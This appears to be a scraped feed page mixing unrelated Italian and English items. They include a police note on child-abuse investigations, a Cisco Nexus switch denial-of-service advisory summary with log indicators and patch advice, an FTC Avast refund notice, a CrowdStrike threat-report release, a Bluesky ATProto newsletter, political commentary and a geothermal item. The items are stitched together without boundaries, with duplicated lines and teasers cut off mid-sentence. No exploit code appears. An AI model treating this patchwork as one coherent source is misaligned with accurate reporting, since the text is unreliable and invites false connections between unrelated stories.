Questo genere di operazioni rappresenta una delle sfide più difficili per gli investigatori, costretti a visionare e analizzare contenuti che hanno un impatto devastante non solo sul piano sociale, ma anche psicologico. L’esposizione prolungata a materiale di questo tipo richiede una grande forza mentale e un costante supporto per coloro che si occupano di queste indagini, consapevoli che il loro lavoro è essenziale per salvaguardare l’infanzia da pericoli sempre più insidiosi.
Nonostante la complessità e il peso emotivo di questa missione, si tratta di un compito che qualcuno deve assumersi per il bene della comunità. L’impegno incessante della Polizia Di Stato, con il coordinamento delle autorità giudiziarie, testimonia la volontà di non lasciare spazio all’impunità e di colpire duramente chiunque si renda responsabile di crimini così gravi.
La lotta alla pedopornografia online continua senza sosta, con l’obiettivo di proteggere i più deboli e restituire giustizia alle vittime.
Cisco ha rilasciato un avviso di sicurezza che mette in allerta le aziende e gli amministratori di rete: una vulnerabilità nei suoi switch della serie Nexus 3000 e 9000 potrebbe consentire ad attaccanti di scatenare una condizione di Denial-of-Service (DoS), causando il riavvio improvviso dei dispositivi e l’interruzione delle operazioni di rete.
La problematica risiede nel modulo di diagnostica per il monitoraggio dello stato di salute degli switch. Una gestione errata di specifici frame Ethernet consente a un attaccante non autenticato, ma con accesso alla rete locale, di inviare un flusso continuo di frame Ethernet appositamente confezionati per mandare in tilt il dispositivo.
L’esito? Il riavvio forzato dello switch, con tutte le conseguenze del caso: perdita di connettività, interruzione dei servizi e potenziali impatti critici per le infrastrutture aziendali.
Quali modelli sono a rischio?
Gli switch Cisco interessati sono:
Nexus 3100 Series
Nexus 3200 Series
Nexus 3400 Series
Nexus 3600 Series
Nexus 9200 Series (in modalità standalone NX-OS)
Nexus 9300 Series (in modalità standalone NX-OS)
Nexus 9400 Series (in modalità standalone NX-OS)
Cisco ha confermato che questa vulnerabilità non impatta altri dispositivi come le soluzioni Firepower, la serie MDS e alcuni switch Nexus non elencati.
Come identificare un attacco in corso?
Un exploit riuscito può provocare il fallimento consecutivo dei test diagnostici “L2ACLRedirect health monitoring” o “RewriteEngineLoopback” sui Nexus 3100 e 3200. Segnali di compromissione possono essere rilevati nei log di sistema con messaggi come:
“L2ACLREDIRECT_LOOPBACK_TEST_FAIL”
“REWRITE_ENGINE_LOOPBACK_TEST_FAIL”
Questi eventi precedono un riavvio forzato del dispositivo con il codice di errore “Kernel Panic”. Tuttavia, Cisco avverte che tali messaggi possono apparire anche per cause non legate alla vulnerabilità.
Mitigazioni e soluzioni
Cisco ha già rilasciato aggiornamenti software per risolvere la vulnerabilità. I clienti con contratti di supporto possono ottenere le patch attraverso i canali di aggiornamento ufficiali.
Per verificare la propria esposizione, Cisco mette a disposizione:
Cisco Software Checker, uno strumento per identificare le versioni vulnerabili del software NX-OS.
Cisco Product Security Incident Response Team (PSIRT), che monitora attivamente le minacce e fornisce indicazioni per la protezione dei dispositivi.
Conclusione
Sebbene al momento non risultino exploit attivi in the wild, questa vulnerabilità rappresenta un rischio concreto per le infrastrutture di rete aziendali. Un attacco DoS su switch core potrebbe avere conseguenze disastrose, bloccando servizi essenziali e compromettendo la business continuity.
Per questo motivo, gli amministratori di rete devono intervenire immediatamente, verificando le versioni dei propri dispositivi e applicando le patch rilasciate da Cisco. La sicurezza delle reti aziendali non è mai una questione da rimandare.
“La Federal Trade Commission sta inviando moduli di reclamo ai consumatori che hanno acquistato un software antivirus commercializzato in modo ingannevole da Avast”, viene riportato all’interno del sito web ufficiale del governo degli Stati Uniti della Federal Trade Commission.
La FTC ha affermato in una denuncia del febbraio 2024 che Avast ha ingannato gli utenti affermando che il suo software avrebbe protetto la privacy dei consumatori bloccando il tracciamento di terze parti, ma non è riuscita a informare adeguatamente i consumatori che avrebbe raccolto e venduto i loro dati di navigazione dettagliati e reidentificabili. La FTC ha affermato che Avast ha venduto tali dati a più di 100 terze parti tramite la sua sussidiaria, Jumpshot.
Come parte di un ordine di conciliazione con la FTC, Avast è stata tenuta a pagare 16,5 milioni di dollari, che saranno utilizzati per risarcire i consumatori. L’ordine vieta inoltre ad Avast di travisare il modo in cui utilizza i dati che raccoglie e di vendere o concedere in licenza dati di navigazione da prodotti a marchio Avast a terze parti per scopi pubblicitari, insieme ad altri requisiti.
La FTC sta inviando notifiche via e-mail a 3.690.813 consumatori che hanno acquistato software antivirus da Avast tra agosto 2014 e gennaio 2020. I consumatori idonei a presentare domanda riceveranno una notifica via e-mail da ora al 7 marzo 2025.
I consumatori idonei possono presentare un reclamo online su www.ftc.gov/Avast. Gli importi dei pagamenti dipenderanno da diversi fattori, tra cui il numero di persone che presentano reclami.
La scadenza per presentare un reclamo è il 5 giugno 2025. I consumatori che hanno domande o hanno bisogno di aiuto per presentare un reclamo devono chiamare l’amministratore dei reclami al numero 866-290-0165 o inviare un’e-mail a info@AvastSettlement.com.
Ieri il Ministro Giuseppe Valditara si è recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali.
Ieri il Ministro Giuseppe Valditara si è recato nelle Marche per una visita istituzionale in alcune scuole del territorio e per incontrare studenti, docenti e amministratori locali.
Qui tutti i dettagli ➡️ https://www.mim.gov.
CrowdStrike (NASDAQ: CRWD) ha pubblicato oggi il “Global Threat Report 2025”, che rivela la crescente aggressività delle operazioni cyber della Cina, un aumento dell’ingegneria sociale basata su GenAI, la ricerca e l’utilizzo delle vulnerabilità da parte di gruppi sponsorizzati dagli Stati, e un netto incremento degli attacchi privi di malware basati sull’identità.
Il report rivela che gli avversari legati alla Cina hanno intensificato del 150% le operazioni cyber sponsorizzate dallo Stato, con attacchi mirati nei settori dei servizi finanziari, dei media, manifatturiero e dell’industria, che hanno registrato un’impennata fino al 300%.
Allo stesso tempo, gli avversari di tutto il mondo si stanno avvalendo di tecniche di inganno e manipolazione generate con l’uso dell’intelligenza artificiale, sfruttando credenziali rubate ed eseguendo sempre più spesso attacchi cross-domain – approfittando delle lacune tra endpoint, cloud e identità – per eludere i controlli di sicurezza e agire inosservati nell’ombra.
Il passaggio a intrusioni prive di malware basate sull’abuso di accessi legittimi, unito a tempi di breakout mai registrati prima, lascia ai difensori pochissimo margine di errore. Per fermare gli attacchi moderni, i team di sicurezza devono eliminare i gap di monitoraggio (punti ciechi nella sicurezza), rilevare i movimenti degli avversari in tempo reale e bloccare gli attacchi prima che si intensifichino, perché una volta che gli avversari riescono ad entrare è già troppo tardi.
Principali risultati emersi nel Global Threat Report di CrowdStrike
La ricerca di CrowdStrike, che ha analizzato più di 250 avversari conosciuti e 140 cluster di attività emergenti, rivela:
Lo spionaggio informatico cinese diventa sempre più aggressivo: nel 2024 CrowdStrike ha identificato sette nuovi gruppi di avversari legati alla Cina, contribuendo ad un aumento del 150% delle operazioni di spionaggio informatico. I settori più critici hanno registrato un’impennata fino al 300% negli attacchi mirati.
La GenAI potenzia l’ingegneria sociale: le tecniche di phishing e impersonificazione basate sull’intelligenza artificiale hanno alimentato un aumento del 442% del voice phishing (vishing) tra il primo ed il secondo semestre del 2024. Gruppi di eCrime avanzati come CURLY SPIDER, CHATTY SPIDER e PLUMP SPIDER hanno sfruttato l’ingegneria sociale per rubare credenziali, stabilire sessioni remote di supporto help desk ed eludere il rilevamento.
L’Iran utilizza la GenAI per individuare e sfruttare le vulnerabilità: nel 2024, gli attori legati all’Iran hanno sperimentato in misura crescente la GenAI per la ricerca di vulnerabilità, lo sviluppo di exploit e la gestione delle patch sulle reti nazionali, in linea con le iniziative governative sull’AI.
Dall’intrusione all’accesso – Boom di attacchi senza l’utilizzo di malware: il 79% degli attacchi per ottenere l’accesso iniziale avviene ormai senza l’uso di malware, mentre gli annunci di access broker sono aumentati del 50% su base annua. Gli avversari sfruttano credenziali compromesse per infiltrarsi nei sistemi come utenti legittimi, muovendosi lateralmente senza essere rilevati attraverso attività dirette di tipo hands-on keyboard.
Le minacce interne continuano a crescere: l’avversario DPRK-nexus il gruppo FAMOUS CHOLLIMA, legato alla Corea del Nord (DPKR) è stato responsabile di 304 attacchi scoperti nel 2024. Il 40% di questi incidenti ha riguardato operazioni di minaccia interna, con gli avversari che si sono infiltrati nei sistemi aziendali spacciandosi per dipendenti legittimi al fine di ottenere accesso ai sistemi e condurre attività malevole.
Tempo di breakout a velocità record: il tempo medio di breakout negli attacchi eCrime è sceso a 48 minuti, con il caso più veloce registrato a 51 secondi, lasciando ai difensori pochissimo tempo per reagire.
Ambienti cloud sotto assedio: le intrusioni cloud di nuova origine e non attribuite a specifici attaccanti sono aumentate del 26% su base annua. L’abuso di account validi è la principale tecnica di accesso iniziale e rappresenta il 35% degli incidenti cloud nel primo semestre 2024.
Le vulnerabilità non corrette restano un obiettivo chiave: il 52% delle vulnerabilità osservate era legato all’accesso iniziale, evidenziando la necessità critica di proteggere i punti di ingresso prima che gli avversari riescano a stabilire una presenza persistente nei sistemi.
“Il cyber spionaggio cinese, sempre più aggressivo, unito alla rapida diffusione di strumenti di inganno basati sull’intelligenza artificiale, sta costringendo le organizzazioni a ripensare il proprio approccio alla sicurezza”, ha dichiarato Adam Meyers, Head of Counter Adversary Operations di CrowdStrike. “Gli avversari sfruttano le lacune nell’identità, fanno leva sul social engineering e si muovono tra i diversi domini senza essere individuati, rendendo inefficaci le difese tradizionali. Per fermare le violazioni è necessaria una piattaforma unificata, basata su intelligence e threat hunting in tempo reale, che metta in correlazione identità, cloud e attività degli endpoint per eliminare i punti ciechi in cui si nascondono gli avversari”.
CrowdStrike ha rivoluzionato la cybersecurity con un approccio basato sugli avversari grazie alla piattaforma CrowdStrike Falcon®, che rappresenta il gold standard della sicurezza informatica, offrendo protezione potenziata dall’AI, threat intelligence in tempo reale e threat hunting avanzato per proteggere identità, cloud ed endpoint. Grazie all’Intelligenza Artificiale comportamentale e al machine learning addestrati sulla base della threat intelligence e di trilioni di eventi di sicurezza, CrowdStrike offre una protezione in tempo reale contro le minacce avanzate, fornendo visibilità e protezione complete lungo l’intero ciclo di vita dell’attacco.
Visita l’Adversary Universe di CrowdStrike per conoscere la fonte online completa sugli avversari.
Ascolta il podcast Adversary Universe per ottenere approfondimenti sugli attori delle minacce e raccomandazioni per amplificare le pratiche di sicurezza.
Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: “can ATProto scale down“? Next week will be focused again on Bluesky and it’s surrounding ecosystem of media apps. The News Constellation is a project that recently released that provides a database of […]
Welcome to the bi-weekly tech-focused update on everything that is happening on Bluesky and the wider ATmosphere. The theme continues to be: “can ATProto scale down“? Next week will be focused again on Bluesky and it’s surrounding ecosystem of media apps.
The News
Constellation is a project that recently released that provides a database of all backlinks in the entire network. Constellation now has a database of over 1.2 billion links, and an accompanying website with statistics to slice through. The Constellation API is now also getting integrated into multiple PDS browsers, both PDSls and atp.tools show backlinks to the ATProto records now. This puts PDS browsers more into their own specific place on the network: not a full AppView, but more than just a way to view the content of a PDS.
Bluesky PBC has put out a new proposal for ATProto, Sync 1.1. The proposed update concerns the relays, and the validation work they do. As part of the Authenticated Transfer, which ATProto is named after, relays validate every event on the firehose. This validation process currently requires a relay to store the entire repo, which can take up a lot of space. This is one of the aspects that make hosting a relay more expensive. The proposed update changes the way validation works, which allows a relay to validate the integrity of all the data going through the firehose without having to store the entire repo. Bluesky engineer Devin Ivy provides an explainer thread on how this works here. This update makes it much more feasible for people to self-host relays.
Another proposal by Bluesky PBC is for moderation routing report. The new feature allows labelers to select which type of report they want to receive. A common problem that labelers currently face is that users tend to receive reports that are not relevant for their specific labeling service, which causes them unnecessary extra work, as well as getting unnecessarily exposed to awful content. The new proposed update allows labelers to opt-out of specific reporting categories. Bluesky engineer Bryan Newbold says Bluesky PBC is currently working on implementing the feature, aiming to ship it soon.
In Other News
Bluesky has posted some new job vacancies, and they are now hiring a System Integrity Engineer, Product Designer and Senior Trust and Safety Lead. Both the System Integrity Engineer and Trust and Safety Lead indicate that Bluesky is expanding their Trust and Safety work: both of these jobs are newly created positions, with the engineering position explicitly focused on moderation systems and regulatory compliance.
Some podcasting news: two podcasting apps, Transistor and TrueFans, both added support for displaying Bluesky comments on the podcast episode page. TrueFans also supports fediverse comments, so that a podcast episode page can display comments and reactions from both networks.
Bluesky engineer Jaz wrote an article about ‘lossy’ timelines. The summary is that to maintain performance, the home timelines of accounts that follow more than 4k accounts will not always see all posts on the timeline.
Upcoming ATProto short-form video platform Spark shared their outline on some of the limits they’ll set. Spark aims to allow videos of 300 MB or 3 minutes long (compared to Bluesky’s 50MB or 1 minute), and 12 files for image posts (5MB each). This is part of the reason why Spark is not using Bluesky’s lexicon, instead developing their own. Setting these limits higher will also require Sparks to provide their own PDSes, as the file size limit is set by the Bluesky PDS. Hosting video is expensive, and it is not yet clear how Spark will finance this.
A short tutorial on how to publish lexicon verification. The first verified lexicons are now starting to show up on lexidex.
Roomy has posted a deep dive on their tech stack, how they are combining ATProto and Automerge to build public chatrooms.
Web browser Opera adds Bluesky integration, allowing you to more easily doom scroll in the sidebar of the browser.
Bluesky video client Skylight is now available in beta on Android, after Skylight had trouble with Google to get the Android beta approved.
Some events: Feed builder Graze will hold a meetup in New York this Friday the 28th, and at SXSW (March 10th, Austin) there will be Bluesky meetup.
The Links
An interview with Game Industry Labeler developer Trazy on how builds a community of thousands of game devopers on Bluesky.
A guide (in Japanese) on how to upload videos using Bluesky API (XRPC)
An interview with Bluesky CEO Jay Graber at Knight Media Forum.
A podcast interview with the developer of the ATProto art platform Pinksea
That’s all for this week, thanks for reading! If you want more analysis, you can subscribe to my newsletter. Every week you get an update with all the articles of this week, as well as extra analysis not published anywhere else. You can subscribe below, and follow this blog @fediversereport.com and my personal account @laurenshof.online on Bluesky.
Il presidente statunitense ha trattato con grande sufficienza quello ucraino, accusandolo di voler rischiare una Terza guerra mondiale, tra le altre cose
Ricordo quella mattina di ottobre del 1998 a Milano, all'altezza di viale Bligny, quando io e il Pierre fermi al semaforo, veniamo avvicinati da un'auto con sopra Leone e due giovani ragazze. Guarda il nostro cabriolet bianco, con la capote aperta, si alza in piedi e dice:"Permettete che ci piscio dentro?"
Magari un'altra volta.
"Trenta chili" Leone di Lernia e il Complesso l'Universo (1968)
chissà come mai zelensky ce l'ha così tanto con putin... neppure lo avesse invaso... ha fatto solo un'operazione speciale. per trump invece non era neppure una questione di pace tra ucraina e russia, ma solo affari. le famose "terre rare". qualcuno dica a trump che l'ucraina ha si minerali di valore ma non terre rare. e comunque non così tante come pensa lui. se non fosse così tragica ci sarebbe da ridere sia di trump che di putin. i grandi perculatori. il secondo convinto di essere stato aggredito dalla nato, il primo interessato ad affari con un popolo martoriato. ucraina come fascia di gaza a quanto pare. e pensare che prima dell'invasione ucraina la nato era data per finita... un retaggio del passato. poi creduta rinata, almeno da un paio di paesi confinanti con la russia. e con trump di nuovo morta. tutto cambia. eternamente. se la nato non esiste più, possiamo tornare tutti a casa, grande putin? e ognuno a sfondarsi di spese militari per il prossimo futuro e fregandosene del cambiamenti climatico... questi sono i saggi leader dell'epoca moderrna? quelli "concreti"? se non altro sia putin che trump amano il petrolio. chissà se ci fanno pure bagni di salute dentro. altro che inseguire orsi: le paludi di petrolio. c'è la lotta nel fango, e c'è la lotta nel petrolio.
(Stuart Kauffman "Reinventare il sacro" Codice Edizioni)
Qui sulla Terra, una buona metà di noi crede in un Dio creatore. Qualche altro miliardo crede in un Dio abramitico soprannaturale, e alcuni altri negli antichi dei indù. Tradizioni di saggezza, come il buddismo, sono spesso senza Dio. Circa un miliardo di persone è laico, ma privo di spiritualità e semplice consumatore materialista in una società laica. Se c'è qualcosa a cui noi laici teniamo è l'umanesimo. Ma l'umanesimo, in un'accezione ristretta, è troppo esile per nutrirci come agenti umani nel vasto universo che in parte co-creiamo. Abbiamo bisogno, credo, di un dominio per la nostra vita, ampio come la realtà. Se la metà di noi crede in un Dio soprannaturale, la scienza non confuterà quella fede. Abbiamo bisogno di un luogo per la nostra spiritualità, e un Dio creatore è uno di quei luoghi. Siamo noi, sostengo, ad aver inventato Dio, il più potente dei nostri simboli. E' una nostra scelta la saggezza con cui usare il nostro simbolo per orientare la nostra vita e la nostra civiltà. Credo che possiamo reinventare il sacro. Possiamo inventare un'etica globale in uno spazio condiviso, uno spazio sicuro per noi tutti, dove Dio va inteso come creatività naturale nell'universo.
questa cosa non ha alcun senso... considerando che il costo di una polizza si bassa sulla statistica di quanto costa un evento per l'assicurato e quale sia la probabilità che un evento generico si realizzi, in uno specifico arco di tempo. ora sappiamo che l'incidenza di questo tipo di eventi, diventato "frequente" negli ultimi anni, e pure destinato a salire nell'arco dei prossimi anni, facciamo qualche calcolo
opzione 1) un'assicurazione che mettiamo debba "contabilizzare il rischio" di dover rimborsare il 25% degli assicurati entro i prossimi 2-3 anni, dovrò far pagare un premio che è l'ammontare dei danni programmati per i prossimi anni + un guadagno. e in questo caso il costo dell'assicurazione sarà molto salato per le imprese. alcune potrebbero dover chiudere per l'impossibilità di pagare. quale azienda può assumersi il rischio statistico di perdere l'intera struttura ogni 2-3 anni?
opzione 2) il rischio è così elevato che nessuna assicurazione accetterà di stipulare polizze del genere, perché anti-economiche. perché eventi di questo genere sono diventati la norma e non più l'eccezione.
per capire il problema basti pensare al fatto che sono già sparite le polizze di protezione cristalli sulle auto, a causo della maggior incidenza statistica di questo genere di danno.
opzione 3) magari per legge le aziende assicurative saranno costrette a offrire le polizze a prezzi fattibili, e in questo caso alla prima calamità assisteremo al fallimento dell'assicurazione e quindi a nessun pagamento...
il fatto che secondo l'ottica di qualcuno le assicurazioni sono ladre ed hanno tanti soldi, non significa che offrire una garanzia del genere sia comunque fattibile, di fronte al futuro che ci attende poi. e neppure pare che il mondo voglia davvero preoccuparsi dei cambiamenti climatici... ditelo a cina, brasile, india, usa e urss....
a chiunque scaricherai la patata bollente alla fine, non sarà in grado di pagare. che sia l'azienda, un'assicurazione, o lo stato. e detti questi 3 non mi viene in mente nessun altro che possa pagare.
Polizze catastrofali, è stato pubblicato in Gazzetta Ufficiale del 27 febbraio il decreto attuativo. Confermata la scadenza del 31 marzo 2025 per le imprese. Assicurazioni già in essere da adeguare
Occhi puntati su Londra questa domenica per il vertice sulla Difesa europea indetto dal primo ministro britannico, Keir Starmer, al rientro dal suo incontro con Donald Trump alla Casa Bianca. Invitati a partecipare non solo istituzioni e Paesi membri dell’Ue, ma anche Norvegia, Turchia e vertici
@Informatica (Italy e non Italy 😁) La nuova truffa sul licenziamento, capace di sfruttare il timore della perdita del posto di lavoro, è molto più insidiosa e redditizia delle truffe che promettevano ricche opportunità di lavoro. Ecco come mitigare il rischio L'articolo La truffa del finto licenziamento: come difendersi proviene da Cyber
@Informatica (Italy e non Italy 😁) Il ritiro dell'AI Liability Directive, la proposta di modifica per l’assetto della regolazione della responsabilità civile per danni derivanti dall’uso dell’intelligenza artificiale, ha delle conseguenze. Ecco quali L'articolo Responsabilità
@Informatica (Italy e non Italy 😁) Da un monito di Banca d’Italia emerge che le imprese che non dimostrano un adeguato livello di sicurezza informatica rischiano di vedersi negare l’accesso ai finanziamenti. Ecco perché servono audit di cyber security per ottenere
@Informatica (Italy e non Italy 😁) Polizia di Stato e Aruba per la prevenzione e il contrasto dei crimini informatici, l’accordo Polizia di Stato e Aruba hanno sottoscritto una convenzione per potenziare lo scambio
Nel suo film del 2007 “La giusta distanza”, Carlo Mazzacurati narra la vicenda di un giovane apprendista giornalista, che non riesce, in merito ad un fatto di cronaca, a mantenere la “giusta distanza” dai fatti, come gli ha suggerito il suo mentore. Ovvero non riesce ad approfondire abbastanza quel che accade per averne una visione imparziale, il più possibile corretta e scevra da opinioni ed idee personali: quello che, nella teoria, ogni giornalista dovrebbe tendere a fare nel suo mestiere.
In Italia può essere portato ad esempio di come questo modo di operare sia, nei fatti, ignorato del tutto o quasi. Da parte di molte testate giornalistiche e di TG d'ogni canale è è un muoversi nelle direzioni più disparate: dapprima per rimanere “sul pezzo” e, passata la fase di picco a livello di notizia, per estendere all'infinito una serie di tematiche, perlopiù allarmiste e con un alto tasso di sensazionalismo, fino a coprire intere giornate di trasmissione.
E' anche un po' il limite, per esempio, dei canali “All News”, dove per ventiquattro ore al giorno si trasmette ogni sorta di dettaglio, di accadimento, di vocio per coprire la giornata intera. Reiterando all'infinito le stesse cose (non può accadere qualcosa di clamoroso ogni ora), si finisce con il “caricare” la notizia fino allo spasimo, spesso inserendo note di colore che rendono la narrazione volutamente altisonante, pervasiva, angosciante. Una estremizzazione indotta per mantenere attento lo spettatore.
Chiaramente è una maniera d'operare affatto corretta e per quanto giornalisti ed opinionisti lo neghino, appare abbastanza chiaro che è un mare in cui a loro piace nuotare. Possiamo comprendere che sia più semplice fare così che mantenere quella distanza di cui sopra: si rischia, magari, la noia o una maniera troppo blanda di porgere le notizie e molte persone amano, inconsciamente o meno, il clamore e la chiacchiera, a discapito di coloro che, invece, vorrebbero leggere o sentire semplicemente ciò che è successo, senza fronzoli.
D'altro canto ognuno può essere un amplificatore dei fatti: basta un account su “Facebook” o su “X” dove riprendere e commentare ogni cosa venga detta, magari distorcendo ulteriormente le cose, caricandole con opinioni personali (cui si ha diritto) e facendo rimbalzare tutto ovunque. Una sorta di cerchio infinito in cui la sconfitta è l'informazione di qualità, quella cui dovrebbero sempre ambire tutti. Sarebbe un freno per un mondo già sovraccarico di input, dove siamo “bombardati” senza sosta, senza tregua di cose che ci sentiamo obbligati a seguire.
Un corto circuito permanente d'attenzione e di sovraccarico mediatico. E come ogni cosa portata all'eccesso, è un danno. Cui, temo, non si possa più porre rimedio, se non con la volontà personale di distaccarsi da questa narrazione sbilanciata, reinserendo nel proprio modo di informarsi una quanto mai necessaria dose di distacco e di ragionamento. Cose difficili da fare, faticose, ma non impossibili.
Gli scritti sono tutelati da “Creative Commons” (qui)
Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com
@Notizie dall'Italia e dal mondo Enormi manifestazioni in Grecia nel giorno dello sciopero generale proclamato contro il governo, accusato di aver insabbiato le indagini contro i responsabili del disastro ferroviario di Tempes L'articolo GRECIA: sciopero generale e manifestazioni oceaniche contro
Durante l’audizione di conferma davanti alla Commissione per i servizi armati del Senato Usa, John Phelan, indicato da Donald Trump come prossimo segretario alla Marina (SecNav), ha esposto quelle che saranno le sue priorità come nuovo capo della US Navy e del Corpo dei Marine. Ridurre i
@Politica interna, europea e internazionale Nessun inciucio tra Partito Democratico e Fratelli d’Italia e nessuna crociata contro Elon Musk né tantomeno pregiudizi verso il servizio Starlink di SpaceX ma solo un’attenzione alla salvaguardia della sicurezza nazionale e della capacità
8 marzo 2025, dalle ore 10:00 alle ore 18:00 presso l’Aula Malagodi della Fondazione Luigi Einaudi Introduce Lucetta Scaraffia Contro la strumentalizzazione del diritto, di Silvia Niccolai Maternità fra parto, aborto e gravidanza per altri, di Adriana Cavarero Le difficili alleanze tra i femminismi contemporanei, di Olivia
“Today’s algorithm showed me around 70 murders, 100+ accidents, and around 115 violence videos, is anyone on Instagram noticing it?”#Instagram #ContentModeration
Intervista Katana Koala Kiwi - Katana Koala Kiwi: scopri il loro EP di debutto "Per farmi coraggio mi sono buttato dal piano terra", una fusione di suoni freschi e dirompenti! - Katana Koala Kiwi
Ground-source heat pump systems are one of the most efficient ways to do climate control, but digging the wells can be prohibitively expensive for the individual citizen. What if you could do it at a larger scale?
Starting with a pilot to serve 37 commercial and residential buildings in Framingham, MA, Eversource is using its experience with natural gas drilling and pipe to serve up a lower carbon way to heat and cool this neighborhood. While district heating via geothermal has precedents elsewhere in the country, Boise is a notable example, it has remained a somewhat niche technology. Once networked, excess heat from one location can be used elsewhere in the system, like data centers or industrial facilities being used to heat homes in the winter.
As gas utilities look to transition away from fossil fuels, their existing knowledge base is a perfect fit for geothermal, but there are some regulatory hurdles. Six states have passed laws allowing natural gas utilities to expand beyond just gas, and bills have been filed in six more. This will likely accelerate with the formation of the Utility Networked Geothermal Collaborative which includes many utilities including giants like Dominion Energy who are looking to expand their energy portfolios.
